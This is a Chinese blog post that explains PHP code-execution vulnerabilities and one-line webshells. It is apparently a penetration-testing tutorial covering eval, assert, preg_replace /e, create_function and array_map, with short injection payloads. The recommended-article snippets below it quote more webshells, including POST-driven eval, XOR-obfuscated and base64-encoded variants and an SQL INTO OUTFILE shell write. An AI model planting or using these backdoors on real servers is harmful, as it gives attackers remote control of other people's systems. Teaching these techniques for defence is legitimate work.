[Web漏洞原理解析]代码执行漏洞——一句话木马的千变万化

最新推荐文章于 2024-03-11 21:05:14 发布
最新推荐文章于 2024-03-11 21:05:14 发布
阅读量897 收藏 4
点赞数 1
分类专栏: Web渗透测试 文章标签: php 安全 正则表达式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/slismy/article/details/113043689
版权

Author:Bell0ne_

代码执行漏洞

一、代码执行漏洞原理

用户输入的数据被当做后端代码执行。
其实一句话木马的本质就是一个代码执行漏洞。
RCE:远程命令或者代码执行

二、造成代码执行的函数解析

在PHP中有哪些函数可以造成代码执行?

1、eval()函数
eval()函数中的内容被当做代码执行
是最常用也是最好用的,可以多行执行

2、assert()函数
只能单行执行,不可以用菜刀进行连接
但是我们可以通过assert写一个木马进去,从而getshell

3、preg_replace() 正则替换函数

preg_replace('/a/e',$_GET[8],'abc');

如果目标站点有一个功能,它可以让你任意控制正则表达式,那么就可以通过这个语句来getshell

/a/e =>a是正则表达式,e是修饰符(要去替换的值可以被当做php代码执行)

4、create_function() 函数
create_function()主要用来创建匿名函数
匿名函数

<?php
$a=create_function($id,echo $id);
echo $a(8);
?>

如果可以控制create_function()的代码段,就可以命令执行

create_function()原理就是

function 匿名 ($id)
{.
}

如果create_function定义但没有被调用,可以使用以下骚操作

function 匿名 ($id)
{
phpinfo();}phpinfo();//
}

如果eval被拦截了,可以尝试上传

<?php
$a=create_function($id,$_REQUEST[8]);
?>

再传参 ?8=}phpinfo();//

5、array_map() 回调函数

$a=[1,2,3,4,5];
array_map('函数',$a)

可以调用自定义函数或自带函数
将数组中的数据依次取出放入函数执行

如果可以控制函数,可以写成

array_map('assert',$_REQUEST[1])
array_map($_REQUEST[1],$_REQUEST[2]);

然后传1=assert&2=phpinfo();
eval是无法调用的,他被认为是特殊用法,不属于函数
PHP还有很多回调函数,都可以去利用。

Bell0ne_
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C++的函数重载
weixin_33742618的博客
09-05 5056
——每个现象后面都隐藏一个本质,关键在于我们是否去挖掘 写在前面: 函数重载的重要性不言而明,但是你知道C++中函数重载是如何实现的呢(虽然本文谈的是C++中函数重载的实现,但我想其它语言也是类似的)?这个可以分解为下面两个问题 1、声明/定义重载函数时,是如何解决命名冲突的?(抛开函数重载不谈,using就是一种解决命名冲突的方法,解决命名冲突还有很多其它的方法,这里就不论述了) ...
一句话木马要点和防范注意事项
最新发布
2401_84235249的博客
06-04 754
一句话木马”通常指的是那些简短、易于隐藏或不易被检测到的恶意代码片段,这些代码可能被用于执行恶意活动,如窃取信息、控制受害者的系统等。然而,我必须强调,传播或使用任何形式的恶意软件(包括所谓的“一句话木马”)都是非法的,并且严重违反了网络安全和隐私的原则。权限管理:合理设置服务器和应用程序的权限,避免不必要的权限提升,是防止一句话木马的重要手段,但这也需要管理员具备一定的安全知识和经验。防止注入:防止代码注入是防止一句话木马的关键,但这也是一个技术难题,需要开发者具备一定的安全编程技能。
函数重载
foreverqq24的博客
11-18 246
函数重载 在C++中,同一个函数名称可多次定义,即函数重载。函数重载主要作用是提高代码复用性。 1、函数重载满足条件 同一作用域下 函数名称相同 函数参数类型不同 或者个数不同或者顺序不同 注意:返回值不能作为函数重载的条件 2、示例 #include <iostream> #include <string> using namespace std; void func() { cout << "func 的调用" << endl; } void
一句话木马的工作原理
热门推荐
liwei8703的专栏
11-19 7万+
<br />一句话木马的工作原理一句话木马分析服务端与客户端。<br />"一句话木马"服务端(是用于本地的html提交脚本木马文件)<br />就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 <%execute request("value")%> 其中value可以自己修改<br />"一句话木马"客户端(远程服务器上被插入一句话的asp可执行文件)<br />用来向服务端
利用命令执行漏洞的木马,写入一个代码执行的木马
qiukui_的博客
06-17 659
命令执行漏洞是指,由于服务器端没有针对执行函数做过滤,将用户的输入作为系统命令的参数拼接到命令行中。system() 能够将字符串作为操作系统(Operator Sytstemc,OS)命令执行。但是eval() 不是PHP 的函数,是一种语法结构,不能动态调用。eval() 会将符合PHP 语法规范字符串当作php 代码执行代码执行漏洞是指,将字符串转化成代码的函数 , 进行代码注入。在eval() 执行的字符串要以分号结束。通过命令执行编写代码执行php文件。访问代码执行的文件,成功执行语句。
ImageMagick 命令执行漏洞
mirror97black的博客
12-20 2289
ImageMagick 命令执行漏洞
上传漏洞-一句话木马
Coisini的博客
05-30 8497
声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写! 上传漏洞-一句话木马 讲述内容: 一句话木马 木马使用技巧 (中国菜刀、C32、CKnife) 简介: 一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用 往目标网站中加入一句话木马,然后你就可以在本地通过...
php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理
weixin_39800387的博客
02-19 2342
讲一下SQL注入中写一句话webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
php一句话工作原理,一句话木马的工作原理
weixin_31847389的博客
03-24 2133
一句话木马的工作原理一句话木马分析服务端与客户端。'一句话木马'服务端(是用于本地的html提交脚本木马文件)就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中value可以自己修改'一句话木马'客户端(远程服务器上被插入一句话的asp可执行文件)用来向服务端提交...
php一句话木马调用cmd命令,一句话木马webshell)是如何执行命令的
weixin_31748605的博客
03-09 2887
在很多的渗透过程中,渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是如何执行的呢,下面我们就对webshell进行一个简单的分析。首先我们先看一个原始而又简单的php一句话木马。看到这里不得不赞美前辈的智慧。对于一个稍微懂一些php的人而言,或者初级的安全爱好者,或者脚本小子而言,看到的第一...
一句话木马原理
枫梓林のBlog
04-22 6515
一句话木马原理 文章目录一句话木马原理0x00 前言0x01 解析 PHP 一句话木马原理0x02 解析蚁剑连接一句话木马原理1.蚁剑2.使用蚁剑进行连接0x03 分析蚁剑连接原理0x04 加密的 ASP 一句话后门0x04 JSP一句话木马0x05 ASPX一句话 0x00 前言 常用的一句话后门工具分为 ASP、ASP.NET、JSP和 PHP 四种类型 0x01 解析 PHP 一句话木马原理 常用一句话木马 php一句话木马: <?php @eval($_POST['pass']);?
变种一句话木马
qq_44060093的博客
04-04 941
墨者学院有一道例题 我们打开网站发现了一串php代码 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?> 看着很乱里面用了好多异或运算,但我们只需要打印出...
文件上传漏洞------一句话木马原理解析
m0_69151365的博客
03-11 2280
这是一个最简单的一句话木马,我们用GET传参接受了两个参数,其最终目的是构造出:assert($_GET['1']) -> assert(eval(phpinfo()))这样的语句。我们也可以直接构造eval,但是很容易被杀,在我个人电脑上我们可以关闭保护软件,但是我们可以关闭网站服务器的杀毒软件吗?这串代码是在对上一个代码进行base64解码,完了我们还要执行assert(eval(muma)) 这就是一句话木马的总体原理。我们设置成不允许,刷新靶场再次上传木马文件发现上传成功了。接下来就开始抓包了。
一句话木马各种变形
qq_37872337的博客
06-13 1850
0x00:简介         一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。一句话木马一直在跟杀软斗智斗勇,出现一种,杀软秒更新规则。木马再变形,再被杀。。。 0x01:叙事 一、常见的一句话 ...
一句话木马原理
北冥有鱼
04-21 1万+
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数种变形,但本质是不变的:木马的函数执行了我们发送的命令。 黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码: <%execute request(“value”)%> 其中value...
一句话木马的各种变形
司徒荆的博客
07-13 2563
一句话木马的各种变形
一句话木马变形(编码)
buffedon的博客
12-20 847
一句话木马变形(编码) 注意:如果全文只是加密的密文的话,那么就相当于是一个字符串,在解析的时候不符合语义,依然不会检测出来 base64 编码 php <?php $c = base64_decode('YXNzZXJ0'); $c($_POST['pwd']); ?> java语言 <%@ Page Language="Jscript" Debug=true%> <% var a=Request.Form("mr6"); var res=System.Text.Encod
命令执行漏洞漏洞原理
Lyh0558的博客
04-13 2014
命令执行直接调用操作系统命令。其原理是,在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,造成命令执行漏洞。 command1&command2 两个命令同时执行 command1&&command2 只有前面命令执行成功,后面命令才继续执行 command1;command2 不管前面命令执行成功没有,后面的命...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值